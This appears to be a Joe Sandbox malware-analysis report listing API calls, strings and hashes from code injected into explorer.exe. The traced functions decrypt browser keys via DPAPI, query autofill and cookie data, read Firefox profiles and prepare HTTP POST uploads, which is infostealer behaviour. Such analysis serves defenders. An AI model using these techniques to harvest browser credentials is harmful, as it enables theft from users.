                                                                                                                                      • Opcode ID: 0a4b7e4c1621d7da20e90d13ba8240a13b8dff5738097deadc3fbf64f348fc1f
                                                                                                                                      • Instruction ID: 94c409f55036d47cdaf06fd1acd6f40e8ac4a0454a10d3f8fd8e0aa37e19b58a
                                                                                                                                      • Opcode Fuzzy Hash: 0a4b7e4c1621d7da20e90d13ba8240a13b8dff5738097deadc3fbf64f348fc1f
                                                                                                                                      • Instruction Fuzzy Hash: D43192303053859B8B14AB7A8C9A93E63D9BBCC700F548928B955D2293FB7CCD169261

Control-flow Graph: rendered graph of the function at 7E1D4A (legend: Executed / Not Executed); the raw basic-block edge list is not reproduced here, the APIs reached from it are listed below.
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,007E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 007E19C4
                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 007E1DA9
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362CC), ref: 007E1DCF
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362D0), ref: 007E1DE7
                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 007E1E62
                                                                                                                                        • Part of subcall function 007E1CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,007E2C27), ref: 007E1D02
                                                                                                                                        • Part of subcall function 007E1CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 007E1D0D
                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 007E1E94
                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 007E1EA3
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                                      • String ID: *.*$\*.*
                                                                                                                                      • API String ID: 232625764-1692270452
                                                                                                                                      • Opcode ID: ed488d392e2ada254dc6b13855e888e4efb9c350a98b6459447b96b99cb759e2
                                                                                                                                      • Instruction ID: f9a816ac80dba1f9d2eef14cdf8468ccd44a798e9d57710d1ebcd4bd7fbb6d8c
                                                                                                                                      • Opcode Fuzzy Hash: ed488d392e2ada254dc6b13855e888e4efb9c350a98b6459447b96b99cb759e2
                                                                                                                                      • Instruction Fuzzy Hash: D731A9303053C19BCB24EB76889AA6F77E9AFCC341F444A29F946C7251EB7DCC198691

Control-flow Graph: rendered graph of the function at 7E3E04 (legend: Executed / Not Executed); the raw basic-block edge list is not reproduced here, the APIs reached from it are listed below.
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
                                                                                                                                        • Part of subcall function 007E1B6A: CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
                                                                                                                                        • Part of subcall function 007E1C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,007E3E1E,00000000,?,007E3FA8), ref: 007E1C46
                                                                                                                                        • Part of subcall function 007E1C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,007E3FA8), ref: 007E1C56
                                                                                                                                        • Part of subcall function 007E1C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,007E3FA8), ref: 007E1C76
                                                                                                                                        • Part of subcall function 007E1C31: CloseHandle.KERNELBASE(00000000,?,007E3FA8), ref: 007E1C91
                                                                                                                                        • Part of subcall function 007E2FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,007E3E30,00000000,00000000,?,007E3FA8), ref: 007E2FC1
                                                                                                                                        • Part of subcall function 007E2FB1: lstrlen.KERNEL32("encrypted_key":",?,007E3FA8), ref: 007E2FCE
                                                                                                                                        • Part of subcall function 007E2FB1: StrStrIA.SHLWAPI("encrypted_key":",0083692C,?,007E3FA8), ref: 007E2FDD
                                                                                                                                        • Part of subcall function 007E123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,007E3E4B,00000000), ref: 007E124A
                                                                                                                                        • Part of subcall function 007E123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1268
                                                                                                                                        • Part of subcall function 007E123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1295
                                                                                                                                      • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 007E3E74
                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E3E9E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                                      • String ID: $DPAP$DPAP$IDPAP
                                                                                                                                      • API String ID: 3076719866-957854035
                                                                                                                                      • Opcode ID: 3dd3cd6b439b94663e6f72cbc59795a4fcbcd2eb9f9d9690f8e2bb4a715d75f3
                                                                                                                                      • Instruction ID: 11e62519d99761594fb79e335db9ccd465c50204c7e25daa28bcb900bda17833
                                                                                                                                      • Opcode Fuzzy Hash: 3dd3cd6b439b94663e6f72cbc59795a4fcbcd2eb9f9d9690f8e2bb4a715d75f3
                                                                                                                                      • Instruction Fuzzy Hash: 7B2195716053859BD721EA6A8C85A7FB3DD6B8C700F85062DF845C7201EB78CE4587D2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.0000000000847000.00000040.80000000.00040000.00000000.sdmp, Offset: 00847000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_847000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 106e5a7f180de2e66b0bf93fd4fc1fef305e6ab6dc4ed712bb108012cb19ffb5
                                                                                                                                      • Instruction ID: 36ae9cf180711c53da128bdf57ba9c622501ce456ba6b0005a7899df10b00852
                                                                                                                                      • Opcode Fuzzy Hash: 106e5a7f180de2e66b0bf93fd4fc1fef305e6ab6dc4ed712bb108012cb19ffb5
                                                                                                                                      • Instruction Fuzzy Hash: E5A1397291475A5BDB318E78CCC06A2BBA4FB52324B2D06ADC5E1CB2C2E7A4580BC755
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 007E116F
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 007E4BB6
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF), ref: 007E4BBF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1675517319-0
                                                                                                                                      • Opcode ID: 51057e2e58ac084adc5c75899fb2e88d167ba1c01d166a5577ecf4f6243a6792
                                                                                                                                      • Instruction ID: a1186973371330a129850d9bbce1f4a78cd3de6fed00e1c68635ae7c504584d9
                                                                                                                                      • Opcode Fuzzy Hash: 51057e2e58ac084adc5c75899fb2e88d167ba1c01d166a5577ecf4f6243a6792
                                                                                                                                      • Instruction Fuzzy Hash: 0AE0D871802290E7CA58BB36BC1EA4B3B58AF9A361F10C914F26592090DA3DC841C660
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 007E116F
                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,007E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2), ref: 007E1020
                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1027
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2580854192-0
                                                                                                                                      • Opcode ID: c577c97a9eab4682f1207cfbfdd1ca31b430fda8dd96af02ef1f113e607c6480
                                                                                                                                      • Instruction ID: f0c20b85706ee4dc181ed08eafa581259dd9495c746880ec1785d12eeb200969
                                                                                                                                      • Opcode Fuzzy Hash: c577c97a9eab4682f1207cfbfdd1ca31b430fda8dd96af02ef1f113e607c6480
                                                                                                                                      • Instruction Fuzzy Hash: 48C08C310022A0A2C96027A93C0EBCE3B18EF8D222F000881B60193142CAB98C4082A0
                                                                                                                                      APIs
                                                                                                                                      • GetSystemInfo.KERNELBASE(008420A4,00000001,00000000,0000000A,00833127,007E28DA,00000000,?), ref: 007EBFFC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 31276548-0
                                                                                                                                      • Opcode ID: 2c753ebd06eaf0d0203d00e69c54f1e53a149b90261efbfd83a0f7e9ba3ca59e
                                                                                                                                      • Instruction ID: 28c0423bb8933fdd1e0579945219bed349647f037b352101d547bb9a0f980793
                                                                                                                                      • Opcode Fuzzy Hash: 2c753ebd06eaf0d0203d00e69c54f1e53a149b90261efbfd83a0f7e9ba3ca59e
                                                                                                                                      • Instruction Fuzzy Hash: 85E092317C6384B0EA1033FA6C0FF461445ABA9F80F604521B720E81CADB9D90901022

Control-flow Graph

APIs
  • Part of subcall function 007E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
  • Part of subcall function 007E1B6A: CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
  • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
  • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
• GetTempPathW.KERNEL32(00000104,00000000), ref: 007E3C6A
• GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 007E3C76
• DeleteFileW.KERNELBASE(00000000), ref: 007E3C7D
• CopyFileW.KERNELBASE(?,00000000,00000000), ref: 007E3C89
• lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 007E3D2F
• lstrlen.KERNEL32(00000000), ref: 007E3D36
• wsprintfA.USER32 ref: 007E3D55
• lstrlen.KERNEL32(00000000), ref: 007E3D61
• lstrcat.KERNEL32(00000000,?), ref: 007E3D89
• lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 007E3DB2
• DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 007E3DED
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
• String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
• API String ID: 2923052733-3488123210

Control-flow Graph (first block 7e28f8; graph image and node list not reproduced)
APIs
• DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 007E2AD2
  • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
  • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
• lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 007E29E1
• lstrlen.KERNEL32(00000000), ref: 007E29EC
• wsprintfA.USER32 ref: 007E2A38
• lstrlen.KERNEL32(00000000), ref: 007E2A44
• lstrcat.KERNEL32(00000000,00000000), ref: 007E2A6C
• lstrlen.KERNEL32(00000000,?,?), ref: 007E2A99
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
• String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
• API String ID: 304071051-2605711689

Control-flow Graph (first block 7e2cb5; graph image and node list not reproduced)
APIs
  • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
  • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
  • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
  • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
  • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
  • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
  • Part of subcall function 007E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
  • Part of subcall function 007E1B6A: CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
• GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 007E2D13
• StrStrIW.SHLWAPI(00000000,Profile), ref: 007E2D45
• GetPrivateProfileStringW.KERNEL32(00000000,Path,0083637C,?,00000FFF,?), ref: 007E2D68
• GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 007E2D7B
• lstrlenW.KERNEL32(00000000), ref: 007E2DD8
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
• String ID: IsRelative$Path$Profile$profiles.ini
• API String ID: 2234428054-4107377610

Control-flow Graph (first block 7e1333; graph image and node list not reproduced)
APIs
  • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
  • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
  • Part of subcall function 007E106C: lstrlen.KERNEL32(032A163E,00000000,00000000,00000000,007E1366,75568A60,032A163E,00000000), ref: 007E1074
  • Part of subcall function 007E106C: MultiByteToWideChar.KERNEL32(00000000,00000000,032A163E,00000001,00000000,00000000), ref: 007E1086
  • Part of subcall function 007E12A3: RtlZeroMemory.NTDLL(?,00000018), ref: 007E12B5
• RtlZeroMemory.NTDLL(?,0000003C), ref: 007E13C2
• wsprintfW.USER32 ref: 007E14B5
• RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 007E1594
Strings
• Accept: */*Referer: %S, xrefs: 007E14AF
• Content-Type: application/x-www-form-urlencoded, xrefs: 007E14FB
• POST, xrefs: 007E1465
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
• String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
• API String ID: 3833683434-704803497

Control-flow Graph (first block 7eb1e5; graph image and node list not reproduced)
APIs
• CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 007EB31D
• MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 007EB34F
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: File$CreateMappingView
• String ID: winShmMap1$winShmMap2$winShmMap3
• API String ID: 3452162329-3826999013

Control-flow Graph (first block 7ea40e; graph image and node list not reproduced)
Memory Dump Source
• Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
Similarity
• API ID: memcpy$FileReadmemset
• String ID: winRead
• API String ID: 2051157613-2759563040
                                                                                                                                      • Opcode ID: 0d3b210eb2751b23071a33992471c5e05f8b4a08cf2f1df2a97f9385c01f3307
                                                                                                                                      • Instruction ID: 0d7a678d8e7573b5567bfeb71ede4ee774bdaeb2f72f25315ee243e6fc0285bb
                                                                                                                                      • Opcode Fuzzy Hash: 0d3b210eb2751b23071a33992471c5e05f8b4a08cf2f1df2a97f9385c01f3307
                                                                                                                                      • Instruction Fuzzy Hash: 49318B7220A280BBCB50DE19CC8999F77EAFFC9310F845928F98597251E674FC048B93

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • StrStrIW.KERNELBASE(?,?), ref: 007E2E4B
                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 007E2EE4
                                                                                                                                      • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 007E2F54
                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 007E2F62
                                                                                                                                        • Part of subcall function 007E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A1E
                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A3C
                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A75
                                                                                                                                        • Part of subcall function 007E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A98
                                                                                                                                        • Part of subcall function 007E1BC5: lstrlenW.KERNEL32(00000000,00000000,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1BCC
                                                                                                                                        • Part of subcall function 007E1BC5: StrStrIW.SHLWAPI(00000000,.exe,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1BF0
                                                                                                                                        • Part of subcall function 007E1BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1C05
                                                                                                                                        • Part of subcall function 007E1BC5: lstrlenW.KERNEL32(00000000,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1C1C
                                                                                                                                        • Part of subcall function 007E1AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,007E2E83,PathToExe,00000000,00000000), ref: 007E1B16
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                                      • String ID: PathToExe
                                                                                                                                      • API String ID: 1799103994-1982016430
                                                                                                                                      • Opcode ID: b4d63dbbb962cc09fbfd92c87e1a97d536c24c956267659d116116461e8af75f
                                                                                                                                      • Instruction ID: c3ce672028d73b0c470fa5886fbdd9a1d75773425c6e1cd9341fa1d5cff7e01e
                                                                                                                                      • Opcode Fuzzy Hash: b4d63dbbb962cc09fbfd92c87e1a97d536c24c956267659d116116461e8af75f
                                                                                                                                      • Instruction Fuzzy Hash: 83319171606291AF8715AF26CC1AC7F7AA9EFCC350F00852CF85587242EE38DD16CBA1

                                                                                                                                      Control-flow Graph
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File_alldiv_allmul
                                                                                                                                      • String ID: winTruncate1$winTruncate2
                                                                                                                                      • API String ID: 3568847005-470713972
                                                                                                                                      • Opcode ID: 3536270da5d4005ec628aead4edac18ae04174bc090cefd85d16951810e21c93
                                                                                                                                      • Instruction ID: 26361dc385b54427066a5c2f6e1713e9d9253e4e68a0634313c46304d5a5050e
                                                                                                                                      • Opcode Fuzzy Hash: 3536270da5d4005ec628aead4edac18ae04174bc090cefd85d16951810e21c93
                                                                                                                                      • Instruction Fuzzy Hash: 5A21CC72202240BBCB14CE2ACC85E6777A9FF89310F158169FD14CB285DA39EC40CBA2
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • wsprintfW.USER32 ref: 007E4AA2
                                                                                                                                      • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 007E4AC7
                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 007E4AD4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                                      • String ID: %s\%08x$Software
                                                                                                                                      • API String ID: 1800864259-1658101971
                                                                                                                                      • Opcode ID: d8cf1243339c9f8eb0ea02d0d22312f033b337db0e828dd4dc02a2b62f490710
                                                                                                                                      • Instruction ID: f6a61c4323a822e740578360bcfa9a6ab78c0564086abbeed5ff5e6853aa265d
                                                                                                                                      • Opcode Fuzzy Hash: d8cf1243339c9f8eb0ea02d0d22312f033b337db0e828dd4dc02a2b62f490710
                                                                                                                                      • Instruction Fuzzy Hash: C801DF71601108BFDB189B99DC8ADBF77ADEB85354F40416EF505E3140EAB06E9096A4
                                                                                                                                      APIs
                                                                                                                                      • _alloca_probe.NTDLL ref: 007E431C
                                                                                                                                      • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007E4335
                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 007E4363
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 007E43C8
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                        • Part of subcall function 007E418A: wsprintfW.USER32 ref: 007E4212
                                                                                                                                        • Part of subcall function 007E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,007E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2), ref: 007E1020
                                                                                                                                        • Part of subcall function 007E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1027
                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 007E43B9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 801677237-0
                                                                                                                                      • Opcode ID: 3c6f5d7c561c886c1d9dc21258ad58932945e323c99e67f99f491bc18eec7653
                                                                                                                                      • Instruction ID: 0d8d5f106fd94c26befcb4ec0964f7b529e6651ff84abfc7de0caaac9f417ed3
                                                                                                                                      • Opcode Fuzzy Hash: 3c6f5d7c561c886c1d9dc21258ad58932945e323c99e67f99f491bc18eec7653
                                                                                                                                      • Instruction Fuzzy Hash: 881182B1104241BFE7159B15CC5ADBF77ECFB88304F00892EF489E2110EB78AD589A72
                                                                                                                                      APIs
                                                                                                                                      • memset.NTDLL ref: 007EB8D5
                                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 007EB96F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFilememset
                                                                                                                                      • String ID: psow$winOpen
                                                                                                                                      • API String ID: 2416746761-4101858489
                                                                                                                                      • Opcode ID: 9ebe96e02f796bfed02407f35421ed0797ee222f19fe03bfa6669f4441c8fcff
                                                                                                                                      • Instruction ID: 986d52b05f857f9d401d9a4edfdc103b93b5146e8d2651110c1ef0288d735815
                                                                                                                                      • Opcode Fuzzy Hash: 9ebe96e02f796bfed02407f35421ed0797ee222f19fe03bfa6669f4441c8fcff
                                                                                                                                      • Instruction Fuzzy Hash: 6B717D71A06742DFCB10DF2AC88571ABBE0FF88364F104A29F964D7291D778E944CB92
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A1E
                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A3C
                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A75
                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A98
